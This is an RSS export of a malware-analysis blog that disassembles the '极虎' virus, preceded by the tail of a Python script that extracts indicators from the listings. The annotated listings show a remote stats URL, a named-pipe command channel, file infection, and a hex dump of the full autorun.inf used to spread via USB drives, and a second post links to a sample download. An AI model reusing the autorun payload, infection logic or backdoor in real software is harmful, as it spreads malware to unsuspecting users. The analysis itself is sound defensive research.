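    tags = sorted({API_TAGS[n] for fns in imports.values() for n in fns if n in API_TAGS})
    return {"imports": {m: sorted(v) for m, v in sorted(imports.items())},
            "iocs": {k: sorted(v) for k, v in sorted(iocs.items())},
            "behaviours": tags}


# Lines lifted from the listings on this page; two hand-written comments replaced by the bare IOC.
SAMPLE_LISTING = r"""
00871697  |.  68 08938700   push    00879308                         ; |FileName = "C:\DelInfo.bin"
0087169C  |.  FF15 C4908700 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00875371  |.  FF15 20908700 call    dword ptr [<&ADVAPI32.CreateServ>; \CreateServiceA
00875381  |.  FF15 24908700 call    dword ptr [<&ADVAPI32.StartServi>;  advapi32.StartServiceA
00876973  |.  68 749B8700   push    00879B74                         ; /SubKey = "SYSTEM\CurrentControlSet\Control\SafeBoot\Network"
0087697D  |.  FF15 F4918700 call    dword ptr [<&SHLWAPI.SHDeleteKey>; \SHDeleteKeyA
00878D33   .  FF15 68908700 call    dword ptr [<&KERNEL32.CreateName>;  kernel32.CreateNamedPipeA
00878D39   .  8945 F8       mov     dword ptr [ebp-8], eax           ;  \\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A
00871B1F  |.  68 88948700   |push    00879488                        ;  ASCII "www.baidu.com"
0087524A  |.  83F8 01       cmp     eax, 1                           ;  IE -> http://tj.nba1001.net:7777/tj/mac.html
004019DC  |.  FF15 14104000 call    dword ptr [<&KERNEL32.MoveFileEx>; \MoveFileExA
00871129  |.  E8 627D0000   call    <jmp.&KERNEL32.CreateToolhelp32S>; \CreateToolhelp32Snapshot
"""

if __name__ == "__main__":
    for section, body in analyse(SAMPLE_LISTING).items():
        print(section, body)
```

Two caveats the regexes encode: the import stub in the instruction column is truncated to fit (CreateServ, StartServi), so a name is only trusted from there when no trailing comment resolves it; and file names such as kernel32.dll would pass the host-name pattern, so the extension check runs first. Strings that only reach the API through a register (the pipe name here is a pointer annotated by hand) are not recovered from the instruction itself and still need the analyst.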
<p>Thread A1:<br />
Launches IE on http://tj.nba1001.net:7777/tj/mac.html with CreateProcessA, sleeps 10 seconds and then calls TerminateProcess on it.</p>
<pre class="brush: plain; title: ; notranslate">
00875224  |.  50            push    eax                              ; /pProcessInfo
00875225  |.  8D85 98F9FFFF lea     eax, dword ptr [ebp-668]         ; |
0087522B  |.  50            push    eax                              ; |pStartupInfo
0087522C  |.  6A 00         push    0                                ; |CurrentDir = NULL
0087522E  |.  6A 00         push    0                                ; |pEnvironment = NULL
00875230  |.  68 00000004   push    4000000                          ; |CreationFlags = CREATE_DEFAULT_ERROR_MODE
00875235  |.  6A 01         push    1                                ; |InheritHandles = TRUE
00875237  |.  6A 00         push    0                                ; |pThreadSecurity = NULL
00875239  |.  6A 00         push    0                                ; |pProcessSecurity = NULL
0087523B  |.  8D85 E0F9FFFF lea     eax, dword ptr [ebp-620]         ; |
00875241  |.  50            push    eax                              ; |CommandLine
00875242  |.  6A 00         push    0                                ; |ModuleFileName = NULL
00875244  |.  FF15 3C918700 call    dword ptr [&lt;&amp;KERNEL32.CreateProc&gt;; \CreateProcessA
0087524A  |.  83F8 01       cmp     eax, 1                           ;  open http://tj.nba1001.net:7777/tj/mac.html in IE
0087524D  |. /75 31         jnz     short 00875280
0087524F  |. |FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; /hObject
00875255  |. |FF15 10918700 call    dword ptr [&lt;&amp;KERNEL32.CloseHandl&gt;; \CloseHandle
0087525B  |. |68 10270000   push    2710                             ; /Timeout = 10000. ms
00875260  |. |FF15 E4908700 call    dword ptr [&lt;&amp;KERNEL32.Sleep&gt;]    ; \Sleep
00875266  |. |6A 00         push    0                                ; /wait 10 seconds
00875268  |. |FFB5 E8FEFFFF push    dword ptr [ebp-118]              ; |hProcess
0087526E  |. |FF15 B4908700 call    dword ptr [&lt;&amp;KERNEL32.TerminateP&gt;; \TerminateProcess
00875274  |. |FFB5 E8FEFFFF push    dword ptr [ebp-118]              ; /kill IE
0087527A  |. |FF15 10918700 call    dword ptr [&lt;&amp;KERNEL32.CloseHandl&gt;; \CloseHandle
</pre>
<p>Thread A2:</p>
<pre class="brush: plain; title: ; notranslate">
00871B08  |.  50            push    eax                              ; /pWSAData
00871B09  |.  68 02020000   push    202                              ; |RequestedVersion = 202 (2.2.)
00871B0E  |.  FF15 44928700 call    dword ptr [&lt;&amp;WS2_32.#115&gt;]       ; \WSAStartup
00871B14  |&gt;  8D85 68FEFFFF /lea     eax, dword ptr [ebp-198]
00871B1A  |.  50            |push    eax
00871B1B  |.  6A 00         |push    0
00871B1D  |.  6A 00         |push    0
00871B1F  |.  68 88948700   |push    00879488                        ;  ASCII &quot;www.baidu.com&quot;
00871B24  |.  FF15 48928700 |call    dword ptr [&lt;&amp;WS2_32.getaddrinfo&gt;;  ws2_32.getaddrinfo
00871B2A  |.  85C0          |test    eax, eax                        ;  resolve www.baidu.com, presumably a connectivity check
00872D1D  |.  68 80958700   push    00879580                         ; /FileName = &quot;Wininet.dll&quot;
00872D22  |.  FF15 40918700 call    dword ptr [&lt;&amp;KERNEL32.LoadLibrar&gt;; \LoadLibraryA
00872D28  |.  8945 F4       mov     dword ptr [ebp-C], eax           ;  load wininet.dll
00872D2B  |.  68 8C958700   push    0087958C                         ; /ProcNameOrOrdinal = &quot;InternetOpenA&quot;
00872D30  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D33  |.  FF15 F4908700 call    dword ptr [&lt;&amp;KERNEL32.GetProcAdd&gt;; \GetProcAddress
00872D39  |.  A3 4CDC8700   mov     dword ptr [87DC4C], eax
00872D3E  |.  68 9C958700   push    0087959C                         ; /ProcNameOrOrdinal = &quot;InternetOpenUrlA&quot;
00872D43  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D46  |.  FF15 F4908700 call    dword ptr [&lt;&amp;KERNEL32.GetProcAdd&gt;; \GetProcAddress
00872D4C  |.  A3 50DC8700   mov     dword ptr [87DC50], eax
00872D51  |.  68 B0958700   push    008795B0                         ; /ProcNameOrOrdinal = &quot;HttpQueryInfoA&quot;
00872D56  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D59  |.  FF15 F4908700 call    dword ptr [&lt;&amp;KERNEL32.GetProcAdd&gt;; \GetProcAddress
00872D5F  |.  A3 54DC8700   mov     dword ptr [87DC54], eax
00872D64  |.  68 C0958700   push    008795C0                         ; /ProcNameOrOrdinal = &quot;InternetReadFileExA&quot;
00872D69  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D6C  |.  FF15 F4908700 call    dword ptr [&lt;&amp;KERNEL32.GetProcAdd&gt;; \GetProcAddress
00872D72  |.  A3 58DC8700   mov     dword ptr [87DC58], eax
00872D77  |.  68 D4958700   push    008795D4                         ; /ProcNameOrOrdinal = &quot;InternetCloseHandle&quot;
00872D7C  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D7F  |.  FF15 F4908700 call    dword ptr [&lt;&amp;KERNEL32.GetProcAdd&gt;; \GetProcAddress
00872D85  |.  A3 5CDC8700   mov     dword ptr [87DC5C], eax
00872D8A  |.  68 E8958700   push    008795E8                         ; /ProcNameOrOrdinal = &quot;InternetSetStatusCallback&quot;
00872D8F  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D92  |.  FF15 F4908700 call    dword ptr [&lt;&amp;KERNEL32.GetProcAdd&gt;; \GetProcAddress
00872D98  |.  A3 60DC8700   mov     dword ptr [87DC60], eax          ;  resolve the WinINet functions by name
008727D9   &gt; \8D85 70FEFFFF lea     eax, dword ptr [ebp-190]
008727DF   .  50            push    eax                              ; /pWSAData
008727E0   .  68 02020000   push    202                              ; |RequestedVersion = 202 (2.2.)
008727E5   .  FF15 44928700 call    dword ptr [&lt;&amp;WS2_32.#115&gt;]       ; \WSAStartup
008727EB   &gt;  8D85 5CFEFFFF lea     eax, dword ptr [ebp-1A4]
008727F1   .  50            push    eax
008727F2   .  6A 00         push    0
008727F4   .  6A 00         push    0
008727F6   .  68 44958700   push    00879544                         ;  ASCII &quot;www.xunlei.com&quot;
008727FB   .  FF15 48928700 call    dword ptr [&lt;&amp;WS2_32.getaddrinfo&gt;&gt;;  ws2_32.getaddrinfo
00872801   .  85C0          test    eax, eax                         ;  connectivity check?
00872812   &gt; \FFB5 5CFEFFFF push    dword ptr [ebp-1A4]
00872818   .  FF15 50928700 call    dword ptr [&lt;&amp;WS2_32.freeaddrinfo&gt;;  ws2_32.freeaddrinfo
0087281E   .  6A 40         push    40                               ; /freed the addrinfo...
0087283C   .  68 54958700   push    00879554                         ;  ASCII &quot;www.3-0B6F-415d-B5C7-832F0.com&quot;
00872841   .  FF15 48928700 call    dword ptr [&lt;&amp;WS2_32.getaddrinfo&gt;&gt;;  ws2_32.getaddrinfo
00872847   .  85C0          test    eax, eax                         ;  resolve www.3-0B6F-415d-B5C7-832F0.com
0087285B   .  50            push    eax
0087285C   .  8D85 18FEFFFF lea     eax, dword ptr [ebp-1E8]
00872862   .  50            push    eax
00872863   .  6A 00         push    0
00872865   .  8B85 5CFEFFFF mov     eax, dword ptr [ebp-1A4]
0087286B   .  FF70 10       push    dword ptr [eax+10]
0087286E   .  8B85 5CFEFFFF mov     eax, dword ptr [ebp-1A4]
00872874   .  FF70 18       push    dword ptr [eax+18]
00872877   .  FF95 60FEFFFF call    dword ptr [ebp-1A0]              ;  ws2_32.WSAAddressToStringA
0087287D   .  FFB5 5CFEFFFF push    dword ptr [ebp-1A4]              ;  convert the resolved address to a string
00872883   .  FF15 50928700 call    dword ptr [&lt;&amp;WS2_32.freeaddrinfo&gt;;  ws2_32.freeaddrinfo
0087380C  |&gt; \6A 00         push    0                                ; /pThreadId = NULL
0087380E  |.  6A 00         push    0                                ; |CreationFlags = 0
00873810  |.  6A 00         push    0                                ; |pThreadParm = NULL
00873812  |.  68 88358700   push    00873588                         ; |ThreadFunction = appmgmts.00873588
00873817  |.  6A 00         push    0                                ; |StackSize = 0
00873819  |.  6A 00         push    0                                ; |pSecurity = NULL
0087381B  |.  FF15 80918700 call    dword ptr [&lt;&amp;KERNEL32.CreateThre&gt;; \CreateThread
00873821  |.  8945 F8       mov     dword ptr [ebp-8], eax           ;  create a thread
00873841  |.  A3 68DC8700   mov     dword ptr [87DC68], eax
00873846  |&gt;  FF35 E4B58700 push    dword ptr [87B5E4]               ; /Timeout = 900000. ms
0087384C  |.  FF35 68DC8700 push    dword ptr [87DC68]               ; |hObject = NULL
00873852  |.  FF15 50918700 call    dword ptr [&lt;&amp;KERNEL32.WaitForSin&gt;; \WaitForSingleObject
00873858  |.  85C0          test    eax, eax                         ;  wait for the thread to finish
</pre>
<p>Thread A3:<br />
Creates the named pipe \\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A (PIPE_ACCESS_DUPLEX, message mode, a single instance, so one client at a time) and blocks in ConnectNamedPipe waiting for a client to connect and issue commands. Note the CreateFileA on the same name just before it: that is a client-side open, presumably a check for an instance that already exists, not the creation of the pipe.</p>
<pre class="brush: plain; title: ; notranslate">
00878CCC   .  6A 00         push    0                                ; /hTemplateFile = NULL
00878CCE   .  6A 00         push    0                                ; |Attributes = 0
00878CD0   .  6A 03         push    3                                ; |Mode = OPEN_EXISTING
00878CD2   .  6A 00         push    0                                ; |pSecurity = NULL
00878CD4   .  6A 00         push    0                                ; |ShareMode = 0
00878CD6   .  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00878CDB   .  FF75 F4       push    dword ptr [ebp-C]                ; |FileName
00878CDE   .  FF15 C4908700 call    dword ptr [&lt;&amp;KERNEL32.CreateFile&gt;; \CreateFileA
00878CE4   .  8945 F0       mov     dword ptr [ebp-10], eax          ;  create pipe \\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A
00878D1C   &gt; \6A 00         push    0
00878D1E   .  6A 00         push    0
00878D20   .  68 00010000   push    100
00878D25   .  68 00010000   push    100
00878D2A   .  6A 01         push    1
00878D2C   .  6A 06         push    6
00878D2E   .  6A 03         push    3
00878D30   .  FF75 F4       push    dword ptr [ebp-C]                ;  appmgmts.00879AC0
00878D33   .  FF15 68908700 call    dword ptr [&lt;&amp;KERNEL32.CreateName&gt;;  kernel32.CreateNamedPipeA
00878D39   .  8945 F8       mov     dword ptr [ebp-8], eax           ;  create named pipe \\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A
00878D41   .  6A 00         push    0
00878D43   .  FF75 F8       push    dword ptr [ebp-8]
00878D46   .  FF15 78908700 call    dword ptr [&lt;&amp;KERNEL32.ConnectNam&gt;;  kernel32.ConnectNamedPipe
00878D4C   .  6A 00         push    0                                ; /wait for a connection
</pre>
<p>Thread A4:<br />
Infects exe, rar, htm, html, asp and aspx files</p>
<pre class="brush: plain; title: ; notranslate">
00876E17   &gt; \6A 00         push    0                                ; /hTemplateFile = NULL
00876E19   .  68 80000000   push    80                               ; |Attributes = NORMAL
00876E1E   .  6A 03         push    3                                ; |Mode = OPEN_EXISTING
00876E20   .  6A 00         push    0                                ; |pSecurity = NULL
00876E22   .  6A 00         push    0                                ; |ShareMode = 0
00876E24   .  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00876E29   .  FF75 08       push    dword ptr [ebp+8]                ; |FileName
00876E2C   .  FF15 C4908700 call    dword ptr [&lt;&amp;KERNEL32.CreateFile&gt;; \CreateFileA
00876E32   .  8945 98       mov     dword ptr [ebp-68], eax          ;  open the file
00876E51   .  6A 02         push    2                                ; /Origin = FILE_END
00876E53   .  6A 00         push    0                                ; |pOffsetHi = NULL
00876E55   .  6A 00         push    0                                ; |OffsetLo = 0
00876E57   .  FF75 98       push    dword ptr [ebp-68]               ; |hFile
00876E5A   .  FF15 28918700 call    dword ptr [&lt;&amp;KERNEL32.SetFilePoi&gt;; \SetFilePointer
00876E60   .  8945 DC       mov     dword ptr [ebp-24], eax          ;  set the file pointer
00876E63   .  6A 00         push    0                                ; /MapName = NULL
00876E65   .  6A 00         push    0                                ; |MaximumSizeLow = 0
00876E67   .  6A 00         push    0                                ; |MaximumSizeHigh = 0
00876E69   .  6A 04         push    4                                ; |Protection = PAGE_READWRITE
00876E6B   .  6A 00         push    0                                ; |pSecurity = NULL
00876E6D   .  FF75 98       push    dword ptr [ebp-68]               ; |hFile
00876E70   .  FF15 74918700 call    dword ptr [&lt;&amp;KERNEL32.CreateFile&gt;; \CreateFileMappingA
00876E84   &gt; \68 00040000   push    400                              ; /MapSize = 400 (1024.)
00876E89   .  6A 00         push    0                                ; |OffsetLow = 0
00876E8B   .  6A 00         push    0                                ; |OffsetHigh = 0
00876E8D   .  68 1F000F00   push    0F001F                           ; |AccessMode = F001F
00876E92   .  FF75 D0       push    dword ptr [ebp-30]               ; |hMapObject
00876E95   .  FF15 60918700 call    dword ptr [&lt;&amp;KERNEL32.MapViewOfF&gt;; \MapViewOfFile
00876FB0   .  68 00040000   push    400                              ; /FlushSize = 400
00876FB5   .  FF75 D8       push    dword ptr [ebp-28]               ; |FlushBase
00876FB8   .  FF15 94908700 call    dword ptr [&lt;&amp;KERNEL32.FlushViewO&gt;; \FlushViewOfFile
00877304   .  FF75 D8       push    dword ptr [ebp-28]               ; /BaseAddress
00877307   .  FF15 64918700 call    dword ptr [&lt;&amp;KERNEL32.UnmapViewO&gt;; \UnmapViewOfFile
0087730D   .  FF75 D0       push    dword ptr [ebp-30]               ; /hObject
00877310   .  FF15 10918700 call    dword ptr [&lt;&amp;KERNEL32.CloseHandl&gt;; \CloseHandle
00877316   .  8365 D8 00    and     dword ptr [ebp-28], 0
0087731A   .  8365 D0 00    and     dword ptr [ebp-30], 0
0087731E   .  6A 02         push    2                                ; /Origin = FILE_END
00877320   .  6A 00         push    0                                ; |pOffsetHi = NULL
00877322   .  8B85 18FFFFFF mov     eax, dword ptr [ebp-E8]          ; |
00877328   .  0345 AC       add     eax, dword ptr [ebp-54]          ; |
0087732B   .  50            push    eax                              ; |OffsetLo
0087732C   .  FF75 98       push    dword ptr [ebp-68]               ; |hFile
0087732F   .  FF15 28918700 call    dword ptr [&lt;&amp;KERNEL32.SetFilePoi&gt;; \SetFilePointer
00877335   .  FF75 98       push    dword ptr [ebp-68]               ; /hFile
00877338   .  FF15 30918700 call    dword ptr [&lt;&amp;KERNEL32.SetEndOfFi&gt;; \SetEndOfFile
</pre>
<p>Thread A5:<br />
Infects removable drives</p>
<pre class="brush: plain; title: ; notranslate">
008787A4   .  68 80000000   push    80                               ; /FileAttributes = NORMAL
008787A9   .  8D85 E8FDFFFF lea     eax, dword ptr [ebp-218]         ; |
008787AF   .  50            push    eax                              ; |FileName
008787B0   .  FF15 80908700 call    dword ptr [&lt;&amp;KERNEL32.SetFileAtt&gt;; \SetFileAttributesA
008787B6   .  68 80000000   push    80                               ; /set file attributes on recycle.{645FF040-5081-101B-9F08-00AA002F954E}
008787E0   .  50            push    eax                              ; /Path = &quot;MZ&quot;,90,&quot;autorun.inf&quot;
008787E1   .  FF15 F0918700 call    dword ptr [&lt;&amp;SHLWAPI.PathFileExi&gt;; \PathFileExistsA
008787E7   .  83F8 01       cmp     eax, 1                           ;  check whether autorun.inf exists
00878955   &gt; \6A 00         push    0                                ; /hTemplateFile = NULL
00878957   .  68 80000000   push    80                               ; |Attributes = NORMAL
0087895C   .  6A 02         push    2                                ; |Mode = CREATE_ALWAYS
0087895E   .  6A 00         push    0                                ; |pSecurity = NULL
00878960   .  6A 00         push    0                                ; |ShareMode = 0
00878962   .  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00878967   .  8D85 D8F4FFFF lea     eax, dword ptr [ebp-B28]         ; |
0087896D   .  50            push    eax                              ; |FileName
0087896E   .  FF15 C4908700 call    dword ptr [&lt;&amp;KERNEL32.CreateFile&gt;; \CreateFileA
00878974   .  8985 E4FDFFFF mov     dword ptr [ebp-21C], eax         ;  create autorun.inf
00878988   &gt; \6A 00         push    0                                ; /pOverlapped = NULL
0087898A   .  8D85 F4FEFFFF lea     eax, dword ptr [ebp-10C]         ; |
00878990   .  50            push    eax                              ; |pBytesWritten
00878991   .  8D85 E0F5FFFF lea     eax, dword ptr [ebp-A20]         ; |
00878997   .  50            push    eax                              ; |/String
00878998   .  FF15 D0908700 call    dword ptr [&lt;&amp;KERNEL32.lstrlenA&gt;] ; |\lstrlenA
0087899E   .  50            push    eax                              ; |nBytesToWrite
0087899F   .  8D85 E0F5FFFF lea     eax, dword ptr [ebp-A20]         ; |
008789A5   .  50            push    eax                              ; |Buffer = 0006EC78
008789A6   .  FFB5 E4FDFFFF push    dword ptr [ebp-21C]              ; |hFile
008789AC   .  FF15 E0908700 call    dword ptr [&lt;&amp;KERNEL32.WriteFile&gt;&gt;; \WriteFile
008789B2   .  FFB5 E4FDFFFF push    dword ptr [ebp-21C]              ; /write the following contents
0006EC78  5B 61 75 74 6F 72 75 6E 5D 0D 0A 4F 50 45 4E 3D  [autorun]..OPEN=
0006EC88  72 65 63 79 63 6C 65 2E 7B 36 34 35 46 46 30 34  recycle.{645FF04
0006EC98  30 2D 35 30 38 31 2D 31 30 31 42 2D 39 46 30 38  0-5081-101B-9F08
0006ECA8  2D 30 30 41 41 30 30 32 46 39 35 34 45 7D 5C 53  -00AA002F954E}\S
0006ECB8  65 74 75 70 2E 65 78 65 0D 0A 73 68 65 6C 6C 5C  etup.exe..shell\
0006ECC8  6F 70 65 6E 3D B4 F2 BF AA 28 26 4F 29 0D 0A 73  open=打开(&amp;O)..s
0006ECD8  68 65 6C 6C 5C 6F 70 65 6E 5C 43 6F 6D 6D 61 6E  hell\open\Comman
0006ECE8  64 3D 72 65 63 79 63 6C 65 2E 7B 36 34 35 46 46  d=recycle.{645FF
0006ECF8  30 34 30 2D 35 30 38 31 2D 31 30 31 42 2D 39 46  040-5081-101B-9F
0006ED08  30 38 2D 30 30 41 41 30 30 32 46 39 35 34 45 7D  08-00AA002F954E}
0006ED18  5C 53 65 74 75 70 2E 65 78 65 20 53 68 6F 77 0D  \Setup.exe Show.
0006ED28  0A 73 68 65 6C 6C 5C 6F 70 65 6E 5C 44 65 66 61  .shell\open\Defa
0006ED38  75 6C 74 3D 31 2F 2F 0D 0A 73 68 65 6C 6C 5C 65  ult=1//..shell\e
0006ED48  78 70 6C 6F 72 65 3D D7 CA D4 B4 B9 DC C0 ED C6  xplore=资源管理
0006ED58  F7 28 26 58 29 0D 0A 73 68 65 6C 6C 5C 65 78 70  ?&amp;X)..shell\exp
0006ED68  6C 6F 72 65 5C 43 6F 6D 6D 61 6E 64 3D 72 65 63  lore\Command=rec
0006ED78  79 63 6C 65 2E 7B 36 34 35 46 46 30 34 30 2D 35  ycle.{645FF040-5
0006ED88  30 38 31 2D 31 30 31 42 2D 39 46 30 38 2D 30 30  081-101B-9F08-00
0006ED98  41 41 30 30 32 46 39 35 34 45 7D 5C 53 65 74 75  AA002F954E}\Setu
0006EDA8  70 2E 65 78 65 20 53 68 6F 77                    p.exe Show
008789BE   .  6A 00         push    0                                ; /pSecurity = NULL
008789C0   .  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ; |
008789C6   .  50            push    eax                              ; |Path
008789C7   .  FF15 84908700 call    dword ptr [&lt;&amp;KERNEL32.CreateDire&gt;; \CreateDirectoryA
008789CD   .  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ;  create directory recycle.{645FF040-5081-101B-9F08-00AA002F954E}
008789F0   &gt; \6A 00         push    0                                ; /hTemplateFile = NULL
008789F2   .  68 80000000   push    80                               ; |Attributes = NORMAL
008789F7   .  6A 02         push    2                                ; |Mode = CREATE_ALWAYS
008789F9   .  6A 00         push    0                                ; |pSecurity = NULL
008789FB   .  6A 00         push    0                                ; |ShareMode = 0
008789FD   .  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00878A02   .  8D85 E8FDFFFF lea     eax, dword ptr [ebp-218]         ; |
00878A08   .  50            push    eax                              ; |FileName
00878A09   .  FF15 C4908700 call    dword ptr [&lt;&amp;KERNEL32.CreateFile&gt;; \CreateFileA
00878A0F   .  8985 E4FDFFFF mov     dword ptr [ebp-21C], eax         ;  create recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe
</pre>
<p>Thread A6 (infinite loop):</p>
<pre class="brush: plain; title: ; notranslate">
00878043   .  6A 40         push    40                               ; /BufSize = 40 (64.)
00878045   .  8D85 28FEFFFF lea     eax, dword ptr [ebp-1D8]         ; |
0087804B   .  50            push    eax                              ; |Buffer
0087804C   .  FF15 74928700 call    dword ptr [&lt;&amp;WS2_32.#57&gt;]        ; \gethostname
00878052   .  8D85 28FEFFFF lea     eax, dword ptr [ebp-1D8]         ;  get the host name
00878058   .  50            push    eax                              ; /Name
00878059   .  FF15 2C928700 call    dword ptr [&lt;&amp;WS2_32.#52&gt;]        ; \gethostbyname
00877ABF   &gt; \6A 01         push    1                                ; /Protocol = IPPROTO_ICMP
00877AC1   .  6A 03         push    3                                ; |Type = SOCK_RAW
00877AC3   .  6A 02         push    2                                ; |Family = AF_INET
00877AC5   .  FF15 34928700 call    dword ptr [&lt;&amp;WS2_32.#23&gt;]        ; \socket
00877ACB   .  8945 FC       mov     dword ptr [ebp-4], eax           ;  create the socket
00877B04   .  FF70 10       push    dword ptr [eax+10]               ; /AddrLen
00877B07   .  8B85 40FAFEFF mov     eax, dword ptr [ebp+FFFEFA40]    ; |
00877B0D   .  FF70 18       push    dword ptr [eax+18]               ; |pSockAddr
00877B10   .  FF75 FC       push    dword ptr [ebp-4]                ; |Socket
00877B13   .  FF15 60928700 call    dword ptr [&lt;&amp;WS2_32.#2&gt;]         ; \bind
00877B19   .  83F8 FF       cmp     eax, -1                          ;  bind
00877974  |.  6A 00         push    0                                ; /Callback = NULL
00877976  |.  FF75 1C       push    dword ptr [ebp+1C]               ; |pOverlapped
00877979  |.  FF75 18       push    dword ptr [ebp+18]               ; |pFromSize
0087797C  |.  FF75 14       push    dword ptr [ebp+14]               ; |pFrom
0087797F  |.  8D45 F8       lea     eax, dword ptr [ebp-8]           ; |
00877982  |.  50            push    eax                              ; |pFlags
00877983  |.  8D45 F4       lea     eax, dword ptr [ebp-C]           ; |
00877986  |.  50            push    eax                              ; |pReceivedCount
00877987  |.  6A 01         push    1                                ; |nBuffers = 1
00877989  |.  8D45 EC       lea     eax, dword ptr [ebp-14]          ; |
0087798C  |.  50            push    eax                              ; |pBuffers
0087798D  |.  FF75 08       push    dword ptr [ebp+8]                ; |Socket
00877990  |.  FF15 6C928700 call    dword ptr [&lt;&amp;WS2_32.WSARecvFrom&gt;&gt;; \WSARecvFrom
00877996  |.  8945 FC       mov     dword ptr [ebp-4], eax           ;  receive
00877C1C   .  FF70 10       push    dword ptr [eax+10]               ; /ToLength
00877C1F   .  8B85 F4FBFFFF mov     eax, dword ptr [ebp-40C]         ; |
00877C25   .  FF70 18       push    dword ptr [eax+18]               ; |pTo
00877C28   .  6A 00         push    0                                ; |Flags = 0
00877C2A   .  FFB5 B8F9FEFF push    dword ptr [ebp+FFFEF9B8]         ; |DataSize
00877C30   .  8D85 F8FBFFFF lea     eax, dword ptr [ebp-408]         ; |
00877C36   .  50            push    eax                              ; |Data = 0005EA74
00877C37   .  FF75 FC       push    dword ptr [ebp-4]                ; |Socket
00877C3A   .  FF15 64928700 call    dword ptr [&lt;&amp;WS2_32.#20&gt;]        ; \sendto
00877C40   .  83F8 FF       cmp     eax, -1                          ;  send...
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.lingdux.com/2010/216.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>极虎 virus sample analysis</title>
		<link>http://www.lingdux.com/2010/194.html</link>
		<comments>http://www.lingdux.com/2010/194.html#comments</comments>
		<pubDate>Wed, 16 Jun 2010 13:38:10 +0000</pubDate>
		<dc:creator>零度x</dc:creator>
				<category><![CDATA[病毒分析]]></category>
		<category><![CDATA[分析]]></category>
		<category><![CDATA[极虎]]></category>
		<category><![CDATA[样本]]></category>
		<category><![CDATA[病毒]]></category>

		<guid isPermaLink="false">http://www.lingdux.com/?p=194</guid>
		<description><![CDATA[Sample download: http://vip.begin09.com/thread-5745-1-1.html

Only the behaviour of the running exe was analyzed: it disables Windows File Protection, changes its own attributes to a DLL, writes C:\WINDOWS\system32\appmgmts.dll and starts it as a service. The dll will be analyzed next time; no time today~]]></description>
			<content:encoded><![CDATA[<p>Sample download: <a href="http://vip.begin09.com/thread-5745-1-1.html">http://vip.begin09.com/thread-5745-1-1.html</a></p>
<p>Only the behaviour of the running exe was analyzed: it disables Windows File Protection, changes its own attributes to a DLL, writes C:\WINDOWS\system32\appmgmts.dll and starts it as a service. The dll will be analyzed next time; no time today~</p>
<pre class="brush: plain; title: ; notranslate">
00401B9A  |.  6A 1C         push    1C                               ; /BufSize = 1C (28.)
00401B9C  |.  8D45 E4       lea     eax, dword ptr [ebp-1C]          ; |
00401B9F  |.  50            push    eax                              ; |Buffer
00401BA0  |.  FF75 E0       push    dword ptr [ebp-20]               ; |Address
00401BA3  |.  FF15 2C914000 call    dword ptr [&lt;&amp;KERNEL32.VirtualQue&gt;; \VirtualQuery
00401BA9  |.  8B45 E8       mov     eax, dword ptr [ebp-18]          ;  VirtualQuery gets the memory region info
00401BAC  |.  A3 38DC4000   mov     dword ptr [40DC38], eax
00401BB1  |.  6A 00         push    0                                ; /pModule = NULL
00401BB3  |.  FF15 04914000 call    dword ptr [&lt;&amp;KERNEL32.GetModuleH&gt;; \GetModuleHandleA
00401BB9  |.  3B05 38DC4000 cmp     eax, dword ptr [40DC38]          ;  GetModuleHandle gets the current module base
00401BBF  |.  75 16         jnz     short 00401BD7                   ;  compare the two; if they differ, exit the thread
</pre>
<pre class="brush: plain; title: ; notranslate">
00402056   .  FF15 14924000 call    dword ptr [&lt;&amp;USER32.GetInputStat&gt;; [GetInputState
0040205C   .  6A 00         push    0                                ; /lParam = 0
0040205E   .  6A 00         push    0                                ; |wParam = 0
00402060   .  6A 00         push    0                                ; |Message = WM_NULL
00402062   .  FF15 48914000 call    dword ptr [&lt;&amp;KERNEL32.GetCurrent&gt;; |[GetCurrentThreadId
00402068   .  50            push    eax                              ; |ThreadId
00402069   .  FF15 18924000 call    dword ptr [&lt;&amp;USER32.PostThreadMe&gt;; \PostThreadMessageA
0040206F   .  6A 00         push    0                                ; /MsgFilterMax = 0
00402071   .  6A 00         push    0                                ; |MsgFilterMin = 0
00402073   .  6A 00         push    0                                ; |hWnd = NULL
00402075   .  8D85 BCFDFFFF lea     eax, dword ptr [ebp-244]         ; |
0040207B   .  50            push    eax                              ; |pMsg
0040207C   .  FF15 0C924000 call    dword ptr [&lt;&amp;USER32.GetMessageA&gt;&gt;; \GetMessageA
004064B4  |.  68 04010000   push    104                              ; /BufSize = 104 (260.)
004064B9  |.  8D85 D8FDFFFF lea     eax, dword ptr [ebp-228]         ; |
004064BF  |.  50            push    eax                              ; |PathBuffer
004064C0  |.  6A 00         push    0                                ; |hModule = NULL
004064C2  |.  FF15 00914000 call    dword ptr [&lt;&amp;KERNEL32.GetModuleF&gt;; \GetModuleFileNameA
004064C8  |.  68 04010000   push    104                              ; /get the current path
004064CD  |.  6A 00         push    0                                ; |c = 00
004064CF  |.  8D85 E0FEFFFF lea     eax, dword ptr [ebp-120]         ; |
004064D5  |.  50            push    eax                              ; |s
004064D6  |.  E8 67290000   call    &lt;jmp.&amp;MSVCRT.memset&gt;             ; \memset
004064DB  |.  83C4 0C       add     esp, 0C
004064DE  |.  8D85 D8FDFFFF lea     eax, dword ptr [ebp-228]
004064E4  |.  50            push    eax                              ; /String2
